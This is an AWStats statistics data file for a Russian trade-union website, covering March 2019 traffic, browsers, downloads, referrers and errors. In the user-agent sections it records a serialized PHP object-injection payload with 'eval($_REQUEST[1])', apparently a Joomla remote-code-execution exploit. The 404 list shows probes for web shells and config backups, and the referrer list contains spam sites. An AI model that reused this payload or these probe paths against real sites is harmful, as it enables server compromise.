AWSTATS DATA FILE 7.0 (build 1.971)
# If you remove this file, all statistics for date 201903 will be lost/reset.
# Last config file used to build this data file was /etc/awstats/awstats.xn--g1akdbaehef3a2a5g.xn--p1ai.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 27
POS_GENERAL 2010                
POS_TIME 2690                
POS_VISITOR 48155               
POS_DAY 80617               
POS_DOMAIN 3666                
POS_LOGIN 3901                
POS_ROBOT 4097                
POS_WORMS 4996                
POS_EMAILSENDER 5127                
POS_EMAILRECEIVER 5270                
POS_SESSION 81535               
POS_SIDER 81748               
POS_FILETYPES 5405                
POS_DOWNLOADS 5812                
POS_OS 11575               
POS_BROWSER 11808               
POS_SCREENSIZE 14337               
POS_UNKNOWNREFERER 14411               
POS_UNKNOWNREFERERBROWSER 15486               
POS_ORIGIN 16300               
POS_SEREFERRALS 16449               
POS_PAGEREFS 16653               
POS_SEARCHWORDS 19097               
POS_KEYWORDS 19852               
POS_MISC 2353                
POS_ERRORS 20494               
POS_CLUSTER 3757                
POS_SIDER_404 20692               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20190401000008 301 88225 5907672835948
FirstTime 20190301000801
LastTime 20190331231321
LastUpdate 20190401000438 14 0 13 0 0
TotalVisits 1001                
TotalUnique 469                 
MonthHostsKnown 0                   
MonthHostsUnknown 1023                
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 86 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 89 327 11016784 203 314 13452556
1 58 194 4483381 144 211 5535541
2 68 193 5160612 258 349 9518116
3 51 185 4639878 209 291 7922552
4 76 162 3595575 213 284 9069318
5 73 140 3204028 358 423 11159990
6 42 80 2503526 211 343 10299953
7 77 267 11809736 198 329 10602702
8 95 387 24817597 195 328 19337329
9 338 1542 40696284 218 362 11169929
10 240 814 50527828 181 290 9257182
11 243 1110 36634301 234 359 19022239
12 217 526 22999784 239 330 12224619
13 233 958 45134688 298 491 14459193
14 439 1491 58952324 317 468 9884710
15 220 833 29541824 280 429 20918061
16 120 557 25942490 225 378 12247858
17 69 360 9581770 154 244 7508055
18 62 278 10807815 173 289 21346530
19 65 316 13483904 245 398 17141759
20 85 279 18680575 260 408 10476820
21 57 297 12686034 184 286 18827199
22 71 172 4362101 224 325 10016444
23 67 315 11838362 167 273 13913289
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 1
ip 3155 11783 462369790
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 1
Legazavr 19 1128 34422490 20190315130508
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 20
yandex 3077 114195814 20190331235933 390
bot[\s_+:,\.\;\/\\-] 1217 46259073 20190331233956 114
wordpress 855 2 20190331233957 0
googlebot 391 7592475 20190331122818 24
mail\.ru 380 83911105 20190328111939 133
seznambot 364 24358584 20190331215534 172
python 18 752806 20190331153313 0
no_user_agent 17 675467 20190328111812 0
archive\.org_bot 17 167147 20190304213915 5
ia_archiver 16 484628 20190323151850 3
java\/[0-9] 4 113939 20190310054950 0
[\s_+:,\.\;\/\\-]bot 5 142311 20190312121239 2
unknown 14 938 20190324085920 14
slurp 1 49522 20190307115004 0
facebook 2 99984 20190321162255 0
favicon 7 237545 20190310145253 0
discovery 6 0 20190326055402 0
cfnetwork 12 450096 20190331175138 0
msiecrawler 6 259728 20190314125458 0
netcraft 1 43446 20190302025006 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 17
css 2312 24343661 0 0
ttf 51 8442948 0 0
woff2 221 13734480 0 0
woff 6 392096 0 0
php 1431 40776255 0 0
html 1394 62105619 0 0
xml 3 3135 0 0
jpg 2241 221832258 0 0
doc 74 17914629 0 0
eot 40 5290501 0 0
png 401 11837567 0 0
pdf 30 15729259 0 0
js 3455 22032673 0 0
docx 8 119850 0 0
Unknown 1 2611 0 0
gif 99 12920781 0 0
svg 16 4891467 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 24
/robots.txt 857 0 57419
/wp-content/uploads/2016/05/%D0%9A%D0%BE%D0%BB%D0%BB%D0%B5%D0%BA%D1%82%D0%B8%D0%B2%D0%BD%D1%8B%D0%B9-%D0%B4%D0%BE%D0%B3%D0%BE%D0%B2%D0%BE%D1%80-2015-2018.pdf 47 9 25113175
/wp-content/uploads/2019/01/%D0%9F%D0%B5%D1%80%D0%B5%D1%87%D0%B5%D0%BD%D1%8C-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D0%B9-%D0%BF%D0%BE-%D0%B4%D0%B8%D1%81%D0%BA%D0%BE%D0%BD%D1%82%D0%BD%D0%BE%D0%B9-%D0%BA%D0%B0%D1%80%D1%82%D0%B5.doc 29 2 6309123
/wp-content/uploads/2019/03/12%D0%A4%D0%95%D0%92%D0%9F%D0%B5%D1%80%D0%B5%D1%87%D0%B5%D0%BD%D1%8C-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D0%B9-%D0%BF%D0%BE-%D0%B4%D0%B8%D1%81%D0%BA%D0%BE%D0%BD%D1%82%D0%BD%D0%BE%D0%B9-%D0%BA%D0%B0%D1%80%D1%82%D0%B5.doc 18 2 3004418
/wp-content/uploads/2016/05/%D0%BF%D0%BE%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BE%D0%B1-%D0%BE%D0%B7%D0%B4%D0%BE%D1%80%D0%BE%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D0%B8-2016.doc 16 0 380928
/wp-content/uploads/2019/02/%D0%9A%D0%BE%D0%BD%D1%86%D0%B5%D1%80%D1%82%D1%8B_%D0%9F%D0%9A.doc 9 0 24883200
/wp-content/uploads/2016/05/%D0%9F%D0%BE%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BE-%D0%BA%D0%BE%D0%BC%D0%B8%D1%81%D1%81%D0%B8%D0%B8-%D0%BF%D0%BE-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D0%BE%D0%BD%D0%BD%D0%BE%D0%B9-%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D0%B5-%D0%BF%D1%80%D0%BE%D1%84%D1%81%D0%BE%D1%8E%D0%B7%D0%BD%D0%BE%D0%B3%D0%BE-%D0%BA%D0%BE%D0%BC%D0%B8%D1%82%D0%B5%D1%82%D0%B0.doc 6 0 273408
/wp-content/uploads/2016/05/%D0%9F%D0%9E%D0%9B%D0%9E%D0%96%D0%95%D0%9D%D0%98%D0%95-%D0%BE-%D0%BA%D0%BE%D0%BC%D0%B8%D1%81%D1%81%D0%B8%D0%B8-%D0%BF%D0%BE-%D0%BA%D1%83%D0%BB%D1%8C%D1%82-%D0%BC%D0%B0%D1%81%D1%81%D0%BE%D0%B2%D0%BE%D0%B9-%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D0%B5.doc 4 0 127488
/wp-content/uploads/2017/03/%D0%9F%D0%BE%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BE-%D1%81%D0%BF%D0%BE%D1%80%D1%82%D0%B8%D0%B2%D0%BD%D0%BE-%D0%BE%D0%B7%D0%B4%D0%BE%D1%80%D0%BE%D0%B2%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D0%BE%D0%B9-%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D0%B5-2017.doc 3 0 95232
/wp-content/uploads/2017/03/%D0%9F%D0%BE%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BE-%D0%BC%D0%B0%D1%82%D0%B5%D1%80%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D0%BE%D0%B9-%D0%BF%D0%BE%D0%BC%D0%BE%D1%89%D0%B8-2017.doc 3 0 144384
/wp-content/uploads/2017/06/%D0%9F%D0%9E%D0%9B%D0%9E%D0%96%D0%95%D0%9D%D0%98%D0%95-%D0%BE%D0%B1-%D0%BE%D0%B7%D0%B4%D0%BE%D1%80%D0%BE%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D0%B8-%D0%B8-%D0%BE%D1%82%D0%B4%D1%8B%D1%85%D0%B5-%D1%87%D0%BB%D0%B5%D0%BD%D0%BE%D0%B2-%D0%9F%D1%80%D0%BE%D1%84%D1%81%D0%BE%D1%8E%D0%B7%D0%B0-%D0%BD%D0%B0-2017-%D0%B3%D0%BE%D0%B4.doc 2 0 67584
/wp-content/uploads/2017/04/%D0%94%D0%BE%D0%BF-%D1%81%D0%BE%D0%B3%D0%BB%D0%B0%D1%88%D0%B5%D0%BD%D0%B8%D0%B5-1-%D0%B2-%D0%9A%D0%BE%D0%BB-%D0%B4%D0%BE%D0%B3%D0%BE%D0%B2%D0%BE%D1%80-1.pdf 2 0 808702
/wp-content/uploads/2017/04/%D0%9F%D0%BE%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BE%D0%B1-%D0%BE%D0%B7%D0%B4%D0%BE%D1%80%D0%BE%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D0%B8-%D0%B8-%D0%BE%D1%82%D0%B4%D1%8B%D1%85%D0%B5-2017.doc 2 0 67584
/wp-content/uploads/2017/11/%D0%9C%D0%B5%D0%B4%D1%83%D1%81%D0%BB%D1%83%D0%B3%D0%B8.doc 2 0 158720
/wp-content/uploads/2017/11/%D0%9F%D0%B5%D1%80%D0%B5%D1%87%D0%B5%D0%BD%D1%8C-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D0%B9-%D0%BF%D0%BE-%D0%B4%D0%B8%D1%81%D0%BA%D0%BE%D0%BD%D1%82%D0%BD%D0%BE%D0%B9-%D0%BA%D0%B0%D1%80%D1%82%D0%B5.doc 2 0 327680
/wp-content/uploads/2019/03/%D0%BE%D0%B1%D1%8A%D1%8F%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D0%B5-%D0%B1%D0%B0%D1%81%D1%81%D0%B5%D0%B9%D0%BD.pdf 1 1 178202
/wp-content/uploads/2016/05/%d0%9a%d0%be%d0%bb%d0%bb%d0%b5%d0%ba%d1%82%d0%b8%d0%b2%d0%bd%d1%8b%d0%b9-%d0%b4%d0%be%d0%b3%d0%be%d0%b2%d0%be%d1%80-2015-2018.pdf 1 0 524551
/wp-content/uploads/2016/06/%D0%9E%D0%B1%D1%89%D0%B5%D0%B5-%D0%BF%D0%BE%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BE-%D0%BF%D0%B5%D1%80%D0%B2%D0%B8%D1%87%D0%BD%D0%BE%D0%B9-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D0%B8-%D0%BF%D1%80%D0%BE%D1%84%D1%81%D0%BE%D1%8E%D0%B7%D0%B0-%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D0%BD%D0%B8%D0%BA%D0%BE%D0%B2-%D0%B7%D0%B4%D1%80%D0%B0%D0%B2%D0%BE%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B5%D0%BD%D0%B8%D1%8F-%D0%A0%D0%A4.pdf 1 0 268062
/wp-content/uploads/2017/03/%D0%B0%D0%BA%D1%82-%D0%BD%D0%B0-%D0%BF%D0%BE%D0%BE%D1%89%D1%80%D0%B5%D0%BD%D0%B8%D0%B5-%D1%83%D0%B2%D0%BE%D0%BB%D1%8C%D0%BD%D1%8F%D0%B5%D0%BC%D0%BE%D0%B3%D0%BE.doc 1 0 33792
/wp-content/uploads/2017/01/%D0%B7%D0%B0%D1%8F%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BC%D0%BE%D0%BB%D0%BE%D0%BA%D0%BE.doc 1 0 28672
/wp-content/uploads/2016/05/\xd0\x9f\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x96\xd0\x95\xd0\x9d\xd0\x98\xd0\x95-\xd0\xbe-\xd0\xba\xd0\xbe\xd0\xbc\xd0\xb8\xd1\x81\xd1\x81\xd0\xb8\xd0\xb8-\xd0\xbf\xd0\xbe-\xd0\xba\xd1\x83\xd0\xbb\xd1\x8c\xd1\x82-\xd0\xbc\xd0\xb0\xd1\x81\xd1\x81\xd0\xbe\xd0\xb2\xd0\xbe\xd0\xb9-\xd1\x80\xd0\xb0\xd0\xb1\xd0\xbe\xd1\x82\xd0\xb5.doc 1 0 42496
/wp-content/uploads/2017/09/%D0%9F%D0%B5%D1%80%D0%B5%D1%87%D0%B5%D0%BD%D1%8C-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D0%B9-%D0%BF%D0%BE-%D0%B4%D0%B8%D1%81%D0%BA%D0%BE%D0%BD%D1%82%D0%BD%D0%BE%D0%B9-%D0%BA%D0%B0%D1%80%D1%82%D0%B5-c-01.2017.doc 1 0 138752
/wp-content/uploads/2017/03/%D0%9F%D0%BE%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-%D0%BE-%D1%81%D1%83%D0%B2%D0%B5%D0%BD%D0%B8%D1%80%D0%B0%D1%85-%D1%8E%D0%B1%D0%B8%D0%BB%D1%8F%D1%80%D0%B0%D0%BC-2017.doc 1 0 32256
/wp-content/uploads/2017/04/%D0%9F%D0%B5%D1%80%D0%B5%D1%87%D0%B5%D0%BD%D1%8C-%D0%BE%D1%80%D0%B3%D0%B0%D0%BD%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D0%B9-%D0%BF%D0%BE-%D0%B4%D0%B8%D1%81%D0%BA%D0%BE%D0%BD%D1%82%D0%BD%D0%BE%D0%B9-%D0%BA%D0%B0%D1%80%D1%82%D0%B5-c-01.2017-%D0%9D%D0%90-24-%D0%9C%D0%90%D0%A0%D0%A2%D0%90-2017%D0%93.doc 1 0 110592
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS 17
linuxsuse 1
linuxandroid 1218
winxp 662
winlong 102
win2000 26
winvista 835
winunknown 6
j2me 1
win2003 20
linuxcentos 1
unix 12
winnt 1353
linux 1280
win7 5152
macosx 1080
winme 12
Unknown 36
END_OS

# Browser ID - Hits
BEGIN_BROWSER 134
firefox66.0 31
firefox28.0 2
chrome52.0.2743.116 4
chrome34.0.1847.137 1
chrome72.0.3626.121 894
firefox4 1
chrome49.0.2623.21 1
safari5.0.2 1
msie8.0 150
firefox64.0 29
msie7.0 67
chrome41.0.2272.89 17
chrome42.0.2311.152 1
firefox50.0 5
chrome72.0.3626.105 189
chrome72.0.3626.119 597
chrome62.0.3202.94 64
firefox38.0 1
safari12.1 1
chrome51.0.2704.103 216
chrome36.0.1985.143 50
firefox25.0 2
chrome44.0.2403.89 1
firefox36.0 1
safari 88
chrome67.0.3396.87 312
chrome53.7.2442.8714 2
safari11.0 202
microsoft\-webdav\-miniredir 1
chrome38.0.2125.104 1
chrome41.0.2225.0 1
android 3
firefox52.0 171
chrome67.0.3396.79 6
chrome71.0.3578.98 303
firefox24.0 5
opera9.80 12
chrome61.0.3163.128 112
firefox63.0 2
iphone 22
chrome39.0.0.0 25
firefox62.0 9
chrome61.0.3163.100 21
chrome34.0.1847.116 3
chrome71.0.3578.99 1108
msie5.0 1
msie9.0 216
chrome26.0.1410.43 1
chrome6.0.428.0 1
chrome66.0.3359.126 24
chrome54.0.2868.49 1
chrome74.0.3723.0 25
chrome73.0.3683.75 220
chrome21.0.1180.75 1
chrome49.0.2623.87 23
chrome41.0.2226.0 1
firefox61.0 1
chrome45.0.2454.94 1
chrome2683 1
firefox39.0 1
chrome64377 1
chrome57208 1
chrome70.0.3538.110 74
chrome69.0.3497.100 30
chrome66.0.3359.170 9
chrome64.0.3282.140 31
msie6.0 211
chrome5.0.375.99 3
firefox34.0 4
chrome58.0.3029.110 123
chrome42.0.2311.90 12
chrome64.0.3282.167 1
netscape3.0 12
firefox59.0 2
chrome60.0.3112.101 2
chrome50.0.2661.102 3
chrome71.0.3578.80 3
chrome70.0.3538.80 23
firefox65.0 2631
chrome70.0.3538.102 93
chrome66.0.3359.181 15
chrome49.0.2623.112 178
chrome62.0.3198.0 1
chrome65.0.3325.181 71
firefox53.0 1
firefox48.0 2
chrome55.0.2883.87 1
chrome57.4.0940.5212 2
firefox42.0 2
firefox52.52.09 2
chrome68.0.3440.106 19
chrome63.0.3239.132 57
firefox21.0 1
firefox29.0 1
chrome49.0.2623.75 9
chrome60.0.3112.113 1
firefox45.0 1
firefox47.0 8
mozilla 992
safari12.0.3 29
chrome68.0.3440.84 6
chrome44.0.2403.133 21
chrome73.0.3683.90 5
chrome64.0.3396.62 1
firefox35.0 1
chrome72.0.3626.96 1
chrome54.0.2875.18 1
safari12.0 700
firefox8.0 1
chrome56.0.2924.87 2
firefox6.0.2 3
chrome55.0.2883.95 1
chrome40.0.2214.85 24
chrome33.0.1750.154 46
chrome66.0.3359.158 60
safari11.1 1
Unknown 36
chrome72.0.3626.109 268
firefox3.6.7 1
chrome70.0.3538.77 1
firefox3.5.6 1
netscape4.61 12
chrome63.0.3239.111 3
firefox2.0.0.8 1
chrome30.0.1599.17 1
safari10.0 1
chrome73.0.3683.86 197
firefox58.0 1
firefox46.0 1
safari9.0 1
chrome67.0.3396.99 15
chrome44.0.2403.119 27
msie10.0 440
chrome65.0.3325.146 1
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 9
WhatsApp/2.19.53_A 20190307165305
WhatsApp/2.19.69_A 20190321090029
okhttp/3.11.0 20190306103546
Mozilla/5.0_(compatible;_WebDataStats/1.0_;__https://webdatastats.com/policy.html) 20190303132035
}__test|O:21:\ 20190331153310
}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:46:\x22eval($_REQUEST[1]);JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\x9D\x8C\x86 20190331153239
Mozilla/5.0_(compatible;_Dataprovider.com) 20190318043149
Opera/9.80_(Android;_Opera_Mini/7.5.31658/28.2647;_U;_ru)_Presto/2.8.119_Version/11.10 20190307015508
Mozilla/5.0_Firefox/35.0 20190325164456
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 6
WhatsApp/2.19.53_A 20190307165305
WhatsApp/2.19.69_A 20190321090029
okhttp/3.11.0 20190306103546
}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:46:\x22eval($_REQUEST[1]);JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\x9D\x8C\x86 20190331153239
Microsoft_Office_Word_2013 20190326055345
}__test|O:21:\ 20190331153310
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 869 1777
From1 6 6
From2 232 330
From3 309 355
From4 1739 9329
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 5
google 78 116
rambler 3 4
bing 8 8
yandex 142 201
yahoo 1 1
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 68
https://jav-fetish.site 12 12
https://medbrowse.info 12 12
http://03p.info 12 12
https://tamada69.com/glavnaya/tamada/ 9 9
http://hit-kino.ru 9 9
https://naturalpharm.com.ua 9 9
http://dobrivikna.com.ua 9 9
https://pro-poly.ru 9 9
https://uginekologa.com 9 9
https://greatdealshop.com 9 9
https://yandex.by/clck/jsredir 0 2
https://grand-chlen.ru 6 6
http://\xD0\xBF\xD1\x80\xD0\xBE\xD1\x84\xD1\x81\xD0\xBE\xD1\x8E\xD0\xB7\xD0\xBC\xD1\x80\xD0\xBD\xD1\x86.\xD1\x80\xD1\x84/%d1%81%d0%b0%d0%bd%d0%b0%d1%82%d0%be%d1%80%d0%b8%d0%b9-%d0%b2%d0%be%d1%80%d0%be%d0%b1%d1%8c%d0%b5%d0%b2%d0%be/ 0 1
https://www.piluli.info 3 3
http://gelstate.ru 3 3
https://videotop.biz 3 3
https://komp-pomosch.ru 3 3
http://greenshop.su 6 6
https://javlibrary.cc 6 6
http://burger-imperia.com 4 4
https://mydoctorok.ru 3 3
https://supermodni.com.ua 3 3
https://distonija.com 3 3
https://vzubah.com 3 3
https://www.dan-invest.ru 6 6
https://onlinewot.ru 3 3
http://vpdr.pl 3 3
http://top10-online-games.com 3 3
http://vchulkax.com 6 6
https://draniki.org 3 3
http://away.vk.com/away.php 1 1
https://lalalove.ru 6 6
https://infogame.name 6 6
http://\xD0\xBF\xD1\x80\xD0\xBE\xD1\x84\xD1\x81\xD0\xBE\xD1\x8E\xD0\xB7\xD0\xBC\xD1\x80\xD0\xBD\xD1\x86.\xD1\x80\xD1\x84 0 20
https://javcoast.com 3 3
https://credit.co.ua 3 3
http://instagram.com 2 2
http://pizza-tycoon.com 8 8
https://franshiza.shtaketniki.ru 3 3
https://komputers-best.ru 3 3
https://www.facebook.com 1 1
https://aitiman.ae 6 6
http://hundejo.com 2 2
https://mamylik.ru 3 3
https://panicatack.com 6 6
http://\xd0\xbf\xd1\x80\xd0\xbe\xd1\x84\xd1\x81\xd0\xbe\xd1\x8e\xd0\xb7\xd0\xbc\xd1\x80\xd0\xbd\xd1\x86.\xd1\x80\xd1\x84 1 1
https://pornhive.org 6 6
https://psn-card.ru 6 6
http://fsalas.com 3 3
http://lerporn.com 6 6
http://pizza-imperia.com 3 3
https://mydirtystuff.com 3 3
http://tabakur77.net 6 6
http://u0167704.isp.regruhosting.ru 0 23
https://dermatovenerologiya.com 3 3
https://torrentgamer.net 3 3
http://xn--g1agq.xn--p1ai 1 1
http://eropho.com 3 3
http://jjbabskoe.ru 6 6
http://new.recipe.ru 2 2
https://php-market.ru 6 6
http://xn----btbdvdh4aafrfciljm6k.xn--p1ai 6 6
https://s-forum.biz 3 3
http://go.mail.ru 4 4
https://new.recipe.ru 3 3
http://kredit-pod-zalog.mozello.ru 3 3
https://sexuria.net 3 3
http://nmicr.ru/about/pressa-o-nmirts/ 7 7
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 3
%d0%b0%d0%be+%d0%b7%d0%b0%d0%be+%d1%81%d0%ba%d0%be+%d0%bf%d1%80%d0%be%d1%84%d0%ba%d1%83%d1%80%d0%be%d1%80%d1%82+%d0%bb%d1%8c%d0%b3%d0%be%d1%82%d0%bd%d1%8b%d0%b5+%d0%bf%d1%83%d1%82%d0%b5%d0%b2%d0%ba%d0%b8 8
%d1%80%d0%b0%d0%b3%d1%83%d0%bb%d0%b8%d0%bd+%d1%8e%d1%80%d0%b8%d0%b9+%d0%b0%d0%bb%d0%b5%d0%ba%d1%81%d0%b0%d0%bd%d0%b4%d1%80%d0%be%d0%b2%d0%b8%d1%87+%d0%be%d0%b1%d0%bd%d0%b8%d0%bd%d1%81%d0%ba+%d0%be%d1%82%d0%b7%d1%8b%d0%b2%d1%8b 1
%d1%80%d0%b0%d0%b3%d1%83%d0%bb%d0%b8%d0%bd+%d0%b2%d1%80%d0%b0%d1%87+%d0%be%d0%bd%d0%ba%d0%be%d0%bb%d0%be%d0%b3+%d0%b2%d0%b8%d0%ba%d0%b8%d0%bf%d0%b5%d0%b4%d0%b8%d1%8f 1
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 14
%d0%bf%d1%80%d0%be%d1%84%d0%ba%d1%83%d1%80%d0%be%d1%80%d1%82 8
%d0%b7%d0%b0%d0%be 8
%d1%81%d0%ba%d0%be 8
%d0%bb%d1%8c%d0%b3%d0%be%d1%82%d0%bd%d1%8b%d0%b5 8
%d0%bf%d1%83%d1%82%d0%b5%d0%b2%d0%ba%d0%b8 8
%d0%b0%d0%be 8
%d1%80%d0%b0%d0%b3%d1%83%d0%bb%d0%b8%d0%bd 2
%d0%be%d1%82%d0%b7%d1%8b%d0%b2%d1%8b 1
%d0%b2%d1%80%d0%b0%d1%87 1
%d0%b0%d0%bb%d0%b5%d0%ba%d1%81%d0%b0%d0%bd%d0%b4%d1%80%d0%be%d0%b2%d0%b8%d1%87 1
%d0%be%d0%b1%d0%bd%d0%b8%d0%bd%d1%81%d0%ba 1
%d0%b2%d0%b8%d0%ba%d0%b8%d0%bf%d0%b5%d0%b4%d0%b8%d1%8f 1
%d0%be%d0%bd%d0%ba%d0%be%d0%bb%d0%be%d0%b3 1
%d1%8e%d1%80%d0%b8%d0%b9 1
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 10
403 3 8736
206 68 3211264
400 219 219
401 49 24353
302 88 0
499 377 0
500 25 6098
405 8 2161
404 814 22259831
301 55 4672
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 478
/%D0%B3%D1%83%D0%B1%D0%B5%D1%80%D0%BD%D0%B0%D1%82%D0%BE%D1%80%D1%81%D0%BA%D0%B0%D1%8F-%D1%91%D0%BB%D0%BA%D0%B0/ 1 -
/wp-content/plugins/simple-ads-manager/jsspwned.php 1 -
/wordpress/ 5 -
/404-wp.php 4 -
/mysql.sql 1 -
/wp-admin.tar.gz 1 -
/admin.php 1 -
/wp-content/plugins/wp-gdpr-compliance/assets/vendor/codemirror/codemirror.css 1 -
/header-cache.php 1 -
/2016/12/ 1 -
/%D1%81-%D0%BD%D0%B0%D1%81%D1%82%D1%83%D0%BF%D0%B0%D1%8E%D1%89%D0%B8%D0%BC-%D0%BD%D0%BE%D0%B2%D1%8B%D0%BC-%D0%B3%D0%BE%D0%B4%D0%BE%D0%BC/ 3 -
/website/ 1 -
/license.php.suspected 1 -
/oldwp/ 1 -
/web/ 2 -
/manifest.json 4 -
/wp-content/plugins/wp-symposium/server/php/zDHdvmEdIoGjny.php 1 -
/wp-config.php_bak 1 -
/rt18_archive.tar.gz 1 -
/wp-content/plugins/lb-mixed-slideshow/gallery/1/jsspwned.php 1 -
/wp-content/themes/medicate/framework/plugins/revslider/temp/update_extract/revslider/jsspwned.php 1 -
/wordpress/wp-content/plugins/easyrotator-for-wordpress/indox.php 1 http://site.ru
/wp-cofigs.php 2 http://site.ru
/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php 2 -
/wp-admin.gz 1 -
/webconfig.txt.php 6 http://www.google.com.hk
/fckeditor/editor/filemanager/connectors/php/upload.php 2 -
/wp-includes/upgrade/theme-compat/popup-pomo.php 1 http://site.ru
/InCreate-FullPackage.gz 2 -
/press/ 2 -
